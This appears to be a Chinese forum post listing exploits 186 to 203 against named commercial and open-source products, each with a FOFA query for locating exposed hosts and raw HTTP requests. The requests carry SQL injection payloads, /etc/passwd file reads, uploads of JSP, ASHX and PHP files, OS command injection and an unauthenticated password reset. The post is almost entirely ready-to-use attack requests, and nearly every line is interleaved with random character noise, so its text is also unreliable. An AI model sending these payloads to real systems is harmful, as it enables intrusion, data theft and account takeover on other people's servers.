GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1' ?7 Q+ @1 `8 Q" ]
Host: host+ w# n( L' W, O& q9 c
9 L! F2 S$ m# g% f8 P: h5 `' q- h6 s9 J# ~( `/ R
186. F-logic DataCube3 SQL注入
7 f( ?0 e, e4 H# sCVE-2024-31750- D: e, f- A' N9 w# H' h4 ^/ Y
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
( T- O8 b! h( E1 h# QFOFA:title=="DataCube3"4 |3 X7 I9 x6 t. B- \
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
8 O% k9 h9 L6 P8 S6 a4 f, CHost: your-ip( l" m( S! `. {# z1 a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.08 c# H+ V7 [8 ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.85 p! h% e) ]3 z% J
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ ~2 w- {6 X! q0 L: ?8 f
Accept-Encoding: gzip, deflate
9 L* ~; W4 C2 K7 g% l# p+ ^1 aConnection: close
i9 v5 f- l$ p9 l: _" QContent-Type: application/x-www-form-urlencoded0 a0 o; d# q* Q2 I5 }9 p& A
1 X7 ]1 t8 c" D- L$ B% q. O
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
# v! X' v, N% n8 ]4 p* c6 G
8 _6 e3 ~" G4 Z; \& O" o- L5 y
' L( v3 O- Y- R9 ?' M187. Mura CMS processAsyncObject SQL注入. L: T6 f0 o& f+ u5 [+ f
CVE-2024-326408 A- X2 d: i2 _6 [
FOFA:"Mura CMS"
9 i9 E0 U$ J/ O$ |+ ]: ~( iPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
. x) T+ u, ?1 \& g# HHost: your-ip
: i, C5 g6 {7 |Content-Type: application/x-www-form-urlencoded
. v# V' x L& |& c( r
3 C/ T! Y8 G" O* ~& Z3 B2 ]1 h4 J0 z9 I# P: C6 l
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
, Q5 ~4 v; v1 [# n2 \
5 T) m' x" C* z% O9 _( O. `* b1 H6 {: K" @9 {( {
188. 叁体-佳会视频会议 attachment 任意文件读取
+ i8 d1 r+ u4 g: z' V9 z6 Xversion <= 3.9.7
% B+ N: d# P6 n V9 g4 Z+ p$ F/ S4 nFOFA:body="/system/get_rtc_user_defined_info?site_id"
, A0 w3 B; }# A$ v( jGET /attachment?file=/etc/passwd HTTP/1.1' x6 q* N% K5 u+ f {
Host: your-ip* @) M+ J/ m+ ~) ]# m" [" m1 V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
5 d7 f( j( [/ }; a7 k8 AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ a5 I* g& y) J
Accept-Encoding: gzip, deflate
; o* h: x4 D! y9 X5 v5 n2 C8 _Accept-Language: zh-CN,zh;q=0.9,en;q=0.84 n$ O' c B: h! \, Z8 D: W8 `
Connection: close
) c7 F9 |: X$ \
2 A: E# w, b5 O( l3 o( _0 E
2 p; b( r" M0 D8 H& p' `189. 蓝网科技临床浏览系统 deleteStudy SQL注入# w4 e8 G4 X& K, d5 b
FOFA:app="LANWON-临床浏览系统"4 H5 v' k+ m0 X: j x) X) C. C, a5 a
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
( Z" b3 k; {+ J, C. [% mHost: your-ip; O r# ?4 d9 J j% U
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
) i* J( q) C0 ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
" H B% F" F% B$ B* [5 t; OAccept-Encoding: gzip, deflate: I/ m1 G$ x" n7 T
Accept-Language: zh-CN,zh;q=0.9- Y1 v6 A$ E `9 b
Connection: close
2 C/ X& V% Y; o8 w# J. W' Y" _0 R, S$ N. o& H: j7 w+ I$ K8 J3 X* c
# Y; ?6 ]3 E6 m7 M190. 短视频矩阵营销系统 poihuoqu 任意文件读取
1 [1 a. \/ j; @0 i! i5 pFOFA:title=="短视频矩阵营销系统"
0 l8 \6 \7 J2 @& F# ]) q O# }POST /index.php/admin/Userinfo/poihuoqu HTTP/2, y" [; j- f- u1 c6 x, i4 y
Host: your-ip
& E0 ?1 V. m! f2 yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36% L( {0 O' y7 b. [& K0 ^" C" x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9; ]6 j+ f% {& I7 i4 l5 b
Content-Type: application/x-www-form-urlencoded: v3 }3 P4 v2 H# e; R! l
Accept-Encoding: gzip, deflate
$ {! L% O. F1 w" x0 nAccept-Language: zh-CN,zh;q=0.9
7 ^5 B" R% n+ e
, M0 P9 N3 o" Y; |* Spoi=file:///etc/passwd
6 _/ g% ~( S& Z b" ?
! q0 z# n1 h# W. ?) ]$ M' {) `& S! r* b U, s
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
. E6 e8 `) E0 l2 s9 Z1 }8 w* jFOFA:body="/CDGServer3/index.jsp"$ _7 N g; g) L6 k$ @2 M
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
! q2 o0 x3 z/ n! H$ R6 H+ f* tHost: your-ip. ^1 n7 `2 [1 A5 y6 u, Q$ i+ b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' z3 _) A, e4 U( F. J: h4 B* E, u
Content-Type: application/x-www-form-urlencoded
, B( c0 [8 g7 b7 h7 Y6 s3 {7 K) c4 ]8 P j& S0 h+ K* j
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=4 _$ J% j6 M- M
9 M' H. l* H4 a4 T. W1 T" v+ x! h! y: z; }) s R7 T$ c
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传1 o- S8 H. \- |
FOFA:title="用户登录_富通天下外贸ERP"
0 ~) ^! r. _0 C: x- ` K5 HPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1' i) N( t+ G; Z' ^- v; w
Host: your-ip0 F9 e/ E. c; O: |7 ]9 l. P1 c* z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
- r8 b/ @! I6 v& r- `9 {6 jContent-Type: application/x-www-form-urlencoded# Z$ D6 X5 A# }
: A- O9 W9 |9 H* } l7 ?
" ]3 p8 H$ q! n5 E! m: F2 u<% @ webhandler language="C#" class="AverageHandler" %> S; t7 L0 Y3 C- j j& Y+ T, f* J- H
using System;2 Y9 T3 H2 [$ l& D4 \$ m4 j
using System.Web;
; [2 r" [- c. A. i( m+ f$ Dpublic class AverageHandler : IHttpHandler7 a% R' x, f$ G
{
, c. I( j7 X, g& P& B) qpublic bool IsReusable- K# [" R) Y) f1 {5 Y
{ get { return true; } }: I5 Q. o8 w. T0 x! J' v6 ^
public void ProcessRequest(HttpContext ctx), ~/ |1 h" G, }# c7 _: y
{/ _8 R K3 x3 J1 J) Z
ctx.Response.Write("test");6 |* X ^) |3 x% g
}; D* _3 \, _! @# P/ n
}; ]. d' U: ~8 a3 k' {
2 A% a7 V4 r. e5 x3 t$ ^, d( _
, v/ S _" A( {% Y
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
: |" D6 k& \5 p. aFOFA:body="山石云鉴主机安全管理系统"7 L( X* |- `% |/ [" U, s' `7 A
GET /master/ajaxActions/getTokenAction.php HTTP/1.1) W. u& C8 G7 x9 _: V
Host: u2 r, I% p! g4 O
Cookie: PHPSESSID=2333333333333;
% b, g) ]4 W, h% gContent-Type: application/x-www-form-urlencoded" [7 K v3 o- ^) \& Z
User-Agent: Mozilla/5.0) }0 u( ]9 ^3 ~- k
) I2 E" Q5 ]6 _0 c3 V7 q
4 K# d" ^+ y+ \POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1) X4 L6 {* |: ~5 M) S4 B# Y
Host:4 Q. ~( a) _+ h' k- o( r
User-Agent: Mozilla/5.0
7 A4 |" P) K' ~: O+ ~# x. PAccept-Encoding: gzip, deflate
* [3 P" u3 H/ P9 a+ Q" g+ x# MAccept: */*" H; `2 ~9 O# @; M* v
Connection: close
& ^5 _8 v- i, C( _+ C ?Cookie: PHPSESSID=2333333333333;
1 L6 B6 E' H( s6 x. yContent-Type: application/x-www-form-urlencoded5 S( m, ?+ u$ S3 t2 R4 w; v
Content-Length: 84' B `& m% j2 v. h3 u2 T
. _0 e& \; z( H" |" \' D: W$ U' E! [7 z
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')+ _$ e3 B; V" F8 z0 \$ E7 h/ M, s. N
, r3 ]! O; ] @4 f$ H- b/ k
5 ` m" V: d ~% k$ M. {GET /master/img/config HTTP/1.1
g9 v- z0 {0 K6 @9 DHost:0 w4 R6 Y# _/ a4 [9 A- C* \2 a
User-Agent: Mozilla/5.0$ U$ F4 e& `! ~/ S0 W+ S: ~: V
+ Z( t4 |5 D2 x) M1 Q# B6 y
$ y* t/ X3 S" `( g1 D: G194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传 \4 Z$ f, h% g! c- G T
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在8 w( [* Y' @) P
3 H2 f* j" B7 Q& F, X6 P
POST /servlet/uploadAttachmentServlet HTTP/1.10 u( _* Z. k* Q! Z
Host: host4 o; U( a% R( t' X, N6 i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36/ s% k) ]8 l8 g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8& `5 l V4 g% K. E
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& y( y6 z( W* }( v4 AAccept-Encoding: gzip, deflate
7 L7 u- h6 u( @* n+ h8 u1 s2 {Connection: close
- {# K1 M7 x9 aContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
: [3 M& c9 Z: Q V, T" b( Y------WebKitFormBoundaryKNt0t4vBe8cX9rZk! g9 t5 l X- ^/ f! i0 p$ r& k
& H, M! P+ |' a0 A2 Y
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
6 }8 h7 W7 B# @) h/ p0 G- w* _1 d0 l- C5 hContent-Type: text/plain7 ], K: a0 J( y7 g+ z6 D2 {' ?6 [3 |, M
<% out.println("hello");%>/ m2 o" ]% b: {% j3 ?, u% @
------WebKitFormBoundaryKNt0t4vBe8cX9rZk. T& D; l$ n1 ~9 q
Content-Disposition: form-data; name="json"
) [4 f: c0 _& f( x! ]4 V {"iq":{"query":{"UpdateType":"mail"}}}
8 V/ { K' d9 Q7 A3 L------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
! n/ b; F5 G6 f, p; H% \8 ~* i1 |
8 m* V6 _3 i# C
$ E! k' q2 S' j4 a195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
4 z. z. ^6 L- X Z9 ~: v9 I1 d6 Z. \FOFA:title=="飞鱼星企业级智能上网行为管理系统8 K/ I. M3 K; L& u6 Q& V' E- ~
POST /send_order.cgi?parameter=operation HTTP/1.19 K+ ^$ \! I- j* L$ {
Host: 127.0.0.1
! V# T. M+ Z5 [8 UPragma: no-cache# Q; d% _* x5 A& r9 E/ j
Cache-Control: no-cache. w0 l5 R1 B" a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36! `- o/ ~/ x! L8 P6 g- s% n5 P
Accept: */*& Q( B3 A* i, U; {: E
Accept-Encoding: gzip, deflate
6 C% N8 V. [* U+ R" f3 ~$ oAccept-Language: zh-CN,zh;q=0.9
. I) ^0 L5 }1 p% G1 [! GConnection: close: q1 d* @! j/ U) N
Content-Type: application/x-www-form-urlencoded5 \# x4 x6 ~! H/ `) z
Content-Length: 68* S. L9 d% p7 T9 k9 t4 r
& v( f; z" B2 v4 |{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
" F( z2 n8 k) P9 i8 Y* {1 ^& P% ^4 W) F; M# z+ y; |
- ]9 S9 v3 P) O" M9 \( _196. 河南省风速科技统一认证平台密码重置
/ A0 x/ M+ @. X4 wFOFA:body="/cas/themes/zbvc/js/jquery.min.js"2 D4 `9 b g, `. M: e: [9 G
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
N6 I+ T: P2 e. K$ u, C9 J, v9 HUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36- J: \4 | d; L6 T. W# K. C
Content-Type: application/json;charset=UTF-82 o, g9 z E/ O4 `4 _6 w- ^
X-Requested-With: XMLHttpRequest7 X8 L6 m& K3 `- S/ p
Host:. K: g% N0 p/ I; z& [4 ^; F6 H
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2' r3 k( z" s1 x; w: p
Content-Length: 45) P- _+ r! i3 U% t! a- j
Connection: close/ L3 w4 B! {! \$ x
M( e+ o- C! a( {! G4 s
{"xgh":"test","newPass":"test666","email":""}
, Q ]5 `- S7 _, X" F0 Q4 }* V8 {
( n2 z Q" u" B" h1 g# `; @. l+ i
% j# ]# r7 T# B0 B; F8 q6 Q% u! v% R% ~
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
) c- c/ g. T b6 O Z4 oFOFA:app="浙大恩特客户资源管理系统"
$ h5 {5 ^; T' s; C) Z9 jGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
( ^" t( v" P: X3 A+ s$ MHost:
6 U1 V8 b. U: ]1 z" [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
e) Q5 V+ Q& I/ Z3 |+ ^Accept-Encoding: gzip, deflate/ c4 m, X% U6 r/ v( d5 ~
Connection: close
4 q2 G1 o% ]6 } g! V- u) w) y* i( d- V5 Z$ y5 H
/ ~1 S- y f" c. y/ N
/ N. [3 a8 V4 Q9 W Z; ]# c" F198. 阿里云盘 WebDAV 命令注入
1 T# K. g4 l' M) MCVE-2024-29640
/ \( K6 @: E% `7 q2 l aGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1! ]9 T: A% W5 W6 j" h) r2 ~
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
3 x: A+ T: I) @+ bAccept: */*
! ~1 a3 I9 W, E) D8 t; uAccept-Encoding: gzip, deflate2 q0 Z& _# D0 b* ^ s3 ~* E" y
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
6 N8 D& j$ E, Q) RConnection: close
" T& K' x6 }2 E- c z9 c
& J. v0 f# {6 l# v
5 n4 S: g" }- G2 e* B e& e199. cockpit系统assetsmanager_upload接口 文件上传. L9 E0 o$ ^; [! @, f: W/ a
; I. m- _0 ]0 k+ O7 }: D S
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
5 z. u3 y6 ^ h' T: O9 {- { x1 ZGET /auth/login?to=/ HTTP/1.1! \& v& p4 u( Z8 A2 ~. b1 M
) f" B- p# }! E- c0 k
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
% _% y# N1 G, Z; b2 L
8 X9 h! J, T9 e7 s* [7 ~! N2.使用刚才上一步获取到的jwt获取cookie:
_) z# u$ K1 ?3 L2 i# I
* q! h! t: s5 \: k" e; \POST /auth/check HTTP/1.1
! U" I$ E; I. p$ _1 DContent-Type: application/json
1 w- C+ _' O0 V+ V; e. [1 |, A. j. \3 |* H8 T6 ?6 {3 h
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
6 U4 D. U0 k, N; Y( ~! p1 e. J [6 ?
8 ?: x- ~$ y6 P响应:200,返回值:
( Q6 ]) ~& T* k2 r1 _3 DSet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
9 y8 S) V I1 ~* c @Fofa:title="Authenticate Please!"! [- v! i3 e* q2 ?
POST /assetsmanager/upload HTTP/1.1
# R& z# n/ m n" p& n5 E$ K6 j5 t& GContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
4 |/ l: l8 i$ X4 l3 y! N: OCookie: mysession=95524f01e238bf51bb60d77ede3bea92
9 D, L4 {4 P& O( `5 _
. S/ P m! K7 {9 s-----------------------------36D28FBc36bd6feE7Fb38 f9 x, Q Y) k7 l+ `
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
; o6 x V v8 W9 wContent-Type: text/php+ t n) @& e) n0 }2 j1 [
! G5 }; U- Q- H( ]& r<?php echo "tttt";unlink(__FILE__);?>
/ `/ A E+ b7 Q0 O-----------------------------36D28FBc36bd6feE7Fb3, B# j- M* O9 x' Q1 p
Content-Disposition: form-data; name="folder"
2 P& D9 I/ j2 O5 ?' }" Y2 v% A- ~$ z- y6 l* p
-----------------------------36D28FBc36bd6feE7Fb3--1 n/ u% }' a/ i) v! ^/ {
9 k% C) ~& W& v& {
+ U$ J P" s* k' Q' R; x
/storage/uploads/tttt.php1 S8 I. ?( t' [% Z' G) _& A
6 C, q/ p& G; j& z+ S8 p* n200. SeaCMS海洋影视管理系统dmku SQL注入
8 [7 D/ b0 l' S5 _" X3 @& v" {FOFA:app="海洋CMS"! M% \- |4 s. r: u/ K- e
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1) q1 U6 I- y/ j9 ?4 I
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
0 r4 j8 l: @" E3 {" M, k+ SUpgrade-Insecure-Requests: 1& K5 ]& b+ N# a0 n, {5 q1 i. h
Cache-Control: max-age=0; q! n: n/ S( x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, v/ V% I) ?! ^ d: RAccept-Encoding: gzip, deflate. h" H! `# t) [, _. \& y" o0 m
Accept-Language: zh-CN,zh;q=0.9
5 H, z7 [$ P# d* ]" J* W
4 a5 ] L: A" d. Z1 T! G$ S5 y/ J4 W% P4 a+ ~* t @
201. 方正全媒体新闻采编系统 binary SQL注入8 O! ?- J2 E# ]4 P5 a
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"' F7 P( `: o* C) m& _
POST /newsedit/newsplan/task/binary.do HTTP/1.17 D, x+ a8 F8 y. ]1 a# u
Content-Type: application/x-www-form-urlencoded
" S: e, g t! C% T( @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
x& c- H* B7 l( B& ?( UAccept-Encoding: gzip, deflate6 q2 J$ S) e7 ~0 ^. u+ A3 X
Accept-Language: zh-CN,zh;q=0.96 T8 d/ E& |: U) r1 P) A
Connection: close9 [! B5 A' {" a* @
0 \2 ]) I* z7 U1 MTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
# @+ ]1 t* P0 l1 t- [% P) I1 N. Q. C C8 d
9 f) P5 k6 x& k9 n, T; o# H+ A
202. 微擎系统 AccountEdit任意文件上传
- A1 y5 v( n" W$ JFOFA:body="/Widgets/WidgetCollection/"2 z0 V$ d2 i0 Q; X _/ V" d
获取__VIEWSTATE和__EVENTVALIDATION值: L7 ~- s0 s5 E2 w; n
GET /User/AccountEdit.aspx HTTP/1.19 j" Q( m$ o6 [5 ~# l' F
Host: 滑板人之家
! O) V* u' X6 J1 oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31) o3 `7 p* L+ U, _) _) X1 `
Content-Length: 01 @2 L. j2 k* }4 O
; E+ E% N$ k6 R3 p" Y( q A$ g3 x7 h0 a
替换__VIEWSTATE和__EVENTVALIDATION值
* `- k( m. L9 L2 h( g: iPOST /User/AccountEdit.aspx HTTP/1.1
. r: O. J! H3 n HAccept-Encoding: gzip, deflate, br5 d" y8 R: m, ]
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687. U& C3 u% E# a# K" z1 G* F, C
: F$ J* Q) ~- i: r) D-----------------------------786435874t38587593865736587346567358735687
: o" m1 [! B" U- w+ v+ ]) \Content-Disposition: form-data; name="__VIEWSTATE"& S4 l! u% p. Q5 J6 F
" z9 J5 M, `% x5 E
__VIEWSTATE0 T4 h8 y$ i- m" Q7 Y8 v
-----------------------------786435874t38587593865736587346567358735687. u. B9 e. D# Z6 P$ R& }& @
Content-Disposition: form-data; name="__EVENTVALIDATION"0 Z, Z4 k _1 ]: D
7 j- p, O9 v: J4 h
__EVENTVALIDATION o5 j( W9 L+ c3 y2 ?$ l/ B% u
-----------------------------786435874t38587593865736587346567358735687
& h, D' F/ ^* u6 n5 D" g+ rContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt") w, |5 c! A4 z, W$ M
Content-Type: text/plain
# S U' H2 {9 I, k8 `$ b+ T. B. x: T0 g% T
Hello World!! V8 Y+ y* D) \+ V0 ^7 }
-----------------------------786435874t38587593865736587346567358735687+ c7 p0 Q2 @$ v; W) Y1 n
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"' ]: ]: k0 k: ^- ~9 o9 m: i4 @' C
) z: f4 W/ q' j3 |
上传图片3 p* \' f- W7 P& S+ a
-----------------------------786435874t38587593865736587346567358735687
$ `' r3 \1 Y% Z/ lContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
7 W0 v( w. Y6 I- \' Z
, N d1 l* f" v6 v. s u; ^9 B9 S: a/ ~& v
-----------------------------786435874t385875938657365873465673587356874 p1 D3 E7 L. y: B
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
: |/ U" {! I, S$ N- E. _
" j' G1 r: f7 t& z" J8 l+ \7 z0 y+ h! K- S" W# U$ w
-----------------------------786435874t38587593865736587346567358735687--
# q1 L6 l3 c' D8 U: }8 K; C
9 c1 K, e. z; j8 n L% Y! ^6 d) c8 E
/_data/Uploads/1123.txt
! @: m; U" e& J) p7 G% `) R+ a7 ^7 y7 W1 w4 w3 S
203. 红海云EHR PtFjk 文件上传
3 I- O6 d3 w* |/ V& a& LFOFA:body="RedseaPlatform", f. O' X7 f A, i
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
5 ~3 U" g) j W' m# UHost: x.x.x.x1 n9 v7 ~8 A, q
Accept-Encoding: gzip+ }, S4 E2 I$ _- ?$ L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! {# L1 J2 m' X# n4 M# D
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
2 h( n G( ~3 D9 l( H7 DContent-Length: 210
9 V" J& B$ q" B2 s7 m- V( z) K$ T. w4 o; j/ T+ r: h- z
------WebKitFormBoundaryt7WbDl1tXogoZys4
U" N- }6 q$ i9 q1 K* u* lContent-Disposition: form-data; name="fj_file"; filename="11.jsp"
- I0 K$ V: G- a/ ]Content-Type:image/jpeg
- R! j# N9 B! O% a) R; m, `4 ~0 ]6 c" Y
<% out.print("hello,eHR");%>
4 K( X2 m* s0 c9 u: K# Y" U------WebKitFormBoundaryt7WbDl1tXogoZys4--
. Q) z4 |( w, ?' _' J) E6 ^3 k) l3 C* Z* ?" a: G# c- m& m
, B8 U1 U) s- a! c
: ^2 `% u% s) D
% R+ A$ f; F3 |/ Q$ T+ r, ?. q- [: O0 l* M \
4 N, D! d. _ Z5 t" o
|
发表于 2024-6-5 14:31:29
收藏
支持
反对